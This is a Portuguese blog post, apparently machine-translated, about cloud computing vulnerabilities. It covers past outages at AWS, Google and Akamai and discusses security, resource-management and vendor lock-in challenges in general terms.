Fonte:<a href="http://juliosevero.blogspot.com.br/">http://juliosevero.blogspot.com.br</a>HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-19489514580446524542013-09-10T09:57:00.002-07:002013-09-10T09:57:28.789-07:00COMPUTAÇÃO EM NUVEM: VULNERABILIDADES NA NUVEMA forma como você define a arquitetura da sua infraestrutura de computação em nuvem pode ter um impacto direto sobre sua capacidade de resistir a falhas.<br />
Nuvens públicas e privadas podem ser afetadas por ataques maliciosos e falhas de infra-estrutura como falta de energia. Tais eventos podem afetar servidores de nome de domínio Internet, impedir o acesso às nuvens ou afetam diretamente as operações da nuvem.<br />
<br />
Por exemplo, um ataque na Akamai Technologies em 15 de junho de 2004, causou uma falha de nome de domínio e um grande apagão que afetou o Google Inc., Yahoo! Inc. e muitos outros sites. Em maio de 2009, o Google foi alvo de um ataque sério (DoS) de denial-of-service que derrubou serviços como Gmail e Google News por vários dias.<br />
<br />
Um raio causou uma inatividade prolongada na Amazon.com Inc. em 29 e 30 de Junho 2012. A nuvem da Amazon Web Services (AWS) na região leste dos Estados Unidos, que consiste de 10 data centers em quatro zonas de disponibilidade, inicialmente foi incomodada por flutuações de energia utilitário provavelmente causadas por uma tempestade elétrica. Uma tempestade de 29 de junho de 2012, na costa leste tirou algumas instalações da Amazônia com base em Virgínia e afetou as empresas que utilizam sistemas exclusivamente nesta região. Instagram, um serviço de compartilhamento de fotos, declaradamente foi uma das vítimas desta paralisação.<br />
<br />
Recuperação destes acontecimentos levou muito tempo e expostos a uma gama de problemas. Por exemplo, um dos 10 centros falhou para alternar para geradores reserva antes de esgotar a energia que poderia ser fornecida pela fonte de alimentação uninterruptible fornecer unidades (UPS). AWS utiliza “controlar aviões” para interruptor permitem que os usuários a recursos em uma região diferente, e este componente de software também falhou.<br />
<br />
O processo de arranque estava com defeito e estendido o tempo necessário para reiniciar o Elastic Compute Cloud (EC2) e serviços de armazenamento de bloco elástico (EBS). Outro problema crítico foi um bug em elástico Load Balancing (ELB), que é usado para rotear o tráfego para servidores com capacidade disponível. Um inseto semelhante afetou o processo de recuperação de serviço do banco de dados relacional (RDS). Este evento trouxe a luz “ocultos” problemas que ocorrem apenas em circunstâncias especiais.<br />
<br />
<h2>
Pedaços de nuvem</h2>
<br />
Um provedor de aplicação de nuvem, um provedor de armazenamento de nuvem e um provedor de rede poderiam implementar políticas diferentes. As imprevisíveis interações entre o balanceamento de carga e outros mecanismos reativos podem provocar instabilidades dinâmicas. O acoplamento não intencional de controladores independentes que gerenciar a carga, consumo de energia e elementos da infra-estrutura pode levar a indesejável feedback e instabilidade similar aos experimentados pela política de roteamento na Internet Border Gateway Protocol (BGP).<br />
Por exemplo, o balanceador de carga de um provedor de aplicativos poderia interagir com o otimizador de poder do provedor de infra-estrutura. Alguns destes acoplamentos só podem manifestar-se sob condições extremas e podem ser muito difícil de detectar sob condições operacionais normais. Quando o sistema tenta se recuperar de uma falha do disco, como no caso da paralisação AWS 2012 podem ter conseqüências desastrosas.<br />
<br />
Recursos em data centers localizados em diferentes áreas geográficas de cluster é um dos meios utilizados para reduzir a probabilidade de falhas catastróficas. Esta dispersão geográfica dos recursos pode ter efeitos colaterais positivos adicionais. Pode reduzir os custos de energia e tráfego de comunicação despachando os cálculos para locais onde a energia elétrica é mais barata. Também pode melhorar o desempenho com uma estratégia de balanceamento de carga inteligente e eficiente.<br />
<br />
No estabelecimento de uma infra-estrutura em nuvem, você tem que equilibrar cuidadosamente os objectivos do sistema tais como maximizar taxa de transferência, utilização de recursos e benefícios financeiros com as necessidades do usuário tais como baixo custo e tempo de resposta e disponibilidade máxima. O preço a pagar por qualquer otimização do sistema é o sistema de maior complexidade. Por exemplo, a latência de comunicação em uma rede de área ampla (WAN) é consideravelmente maior do que a mais de uma rede de área local (LAN) e requer o desenvolvimento de novos algoritmos para tomada de decisão global.<br />
<br />
<h2>
Desafios de nuvem</h2>
<br />
Cloud computing herda alguns dos desafios da paralela e computação distribuída. Também enfrenta muitos desafios principais do seus próprios. Os desafios específicos são diferentes para os modelos de entrega de três nuvens, mas em todos os casos as dificuldades são criadas pela própria natureza de utility computing, que é baseado no compartilhamento de recursos e virtualização de recursos e exige um modelo diferente de confiança que o modelo centrado no usuário onipresente que tem sido o padrão por um longo tempo.<br />
O desafio mais importante é a segurança. Ganhar a confiança de uma base de usuários grande é fundamental para o futuro da nuvem de computação. É irrealista esperar que uma nuvem pública irá fornecer um ambiente adequado para todas as aplicações. Aplicações altamente sensíveis relacionados à gestão de infra-estruturas críticas, aplicações de saúde e outros mais provável serão presentados por nuvens privadas.<br />
<br />
Muitas aplicações em tempo real provavelmente ainda vão ser confinadas para nuvens privadas. Alguns aplicativos podem ser melhor servidos por uma configuração de nuvem híbrida. Tais aplicações podem manter os dados confidenciais em uma nuvem privada e usar uma nuvem pública para alguns do processamento.<br />
<br />
O modelo Software como serviço (SaaS) enfrenta desafios semelhantes como outros serviços on-line necessários para proteger as informações privadas, tais como financeira ou de serviços de saúde. Neste caso, um usuário interage com serviços de nuvem, através de uma interface bem definida. Em princípio, portanto, é menos desafiador para o provedor de serviços fechar alguns dos canais de ataque.<br />
<br />
Ainda assim, tais serviços são vulneráveis a ataques DoS e insiders maliciosos. Dados no armazenamento são mais vulneráveis a ataques, então, dedicar atenção especial para proteger servidores de armazenamento. A replicação de dados necessária para assegurar a continuidade do serviço em caso de falha do sistema de armazenamento aumenta a vulnerabilidade. Criptografia de dados pode proteger os dados no armazenamento, mas eventualmente os dados devem ser descriptografados para processamento. Então ele é exposto para atacar.<br />
<br />
A infra-estrutura como um serviço (IaaS) modelo é de longe o mais desafiador para defender contra ataques. De fato, um usuário de IaaS tem muito mais liberdade do que os outros modelos de entrega dois nuvem. Uma fonte adicional de preocupação é que os recursos da nuvem considerável podem ser usados para iniciar ataques contra a rede e a infra-estrutura de computação.<br />
<br />
A virtualização é uma opção de projeto crítica para este modelo, mas ele expõe o sistema para novas fontes de ataque. O confiável computing base (TCB) de um ambiente virtual inclui não só o hardware e o hipervisor, mas também a gestão do sistema operacional. Você pode salvar todo o estado de uma máquina virtual (VM) para um arquivo para permitir a migração e recuperação, ambas as operações altamente desejáveis.<br />
<br />
Ainda esta possibilidade desafia as estratégias para trazer os servidores pertencentes a uma organização para um estado estável e desejável. Com efeito, uma VM infectada pode ficar inativa, quando os sistemas são limpos. Então ele pode acordar mais tarde e infectar outros sistemas. Este é outro exemplo do profundo entrelaçamento dos efeitos desejáveis e indesejáveis de tecnologias de computação em nuvem básico.<br />
<br />
O próximo grande desafio está relacionado ao gerenciamento de recursos em uma nuvem. Qualquer estratégia de gerenciamento de recurso sistemático (ao invés de ad-hoc) requer a existência de controladores encarregado de implementar várias classes de políticas: controle de admissão, a alocação de capacidade, carregar balanceamento, otimização energética e, por último mas não menos importante, garante o fornecimento de qualidade de serviço (QoS).<br />
<br />
Para implementar estas políticas, os controladores precisam de informações precisas sobre o estado global do sistema. Determinando o estado de um sistema complexo com 106 servidores ou mais, distribuída sobre uma grande área geográfica, não é viável. Com efeito, o external carregar, bem como o estado dos recursos individuais, alterações muito rapidamente. Assim, os controladores devem ser capazes de funcionar com conhecimento incompleto ou aproximado do estado do sistema.<br />
<br />
Parece razoável esperar que tal sistema complexo pode única função com base em princípios de autogestão. Mas, autogestão e auto-organização elevar a fasquia para a aplicação do log e auditoria de processos críticos para a segurança e a confiança em um provedor de serviços de computação em nuvem.<br />
<br />
Sob autogestão torna-se quase impossível identificar as razões que uma determinada ação que resultou em uma falha de segurança foi tomada.<br />
<br />
O último grande desafio que vou abordar está relacionado com a interoperabilidade e padronização. Vendor lock-in — provedor de serviços o fato de que um usuário está vinculado a uma determinada nuvem — é uma grande preocupação para os usuários da nuvem. Padronização apoiaria a interoperabilidade e, assim, aliviar os receios de que um serviço crítico para uma organização de grande porte pode não estar disponível por um período prolongado de tempo.<br />
<br />
A imposição de normas cada vez quando ainda está em desenvolvimento uma tecnologia é desafiador, e pode ser contraproducente porque isso pode sufocar a inovação. É importante perceber a complexidade dos problemas colocados pela computação em nuvem e de compreender a ampla gama de problemas técnicos e sociais nuvem computação levanta. O esforço para migrar a atividades de ti para nuvens públicas e privadas terão um efeito duradouro.<br />
<br />
FONTE : <a href="http://www.securityhacker.org/">http://www.securityhacker.org</a>HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0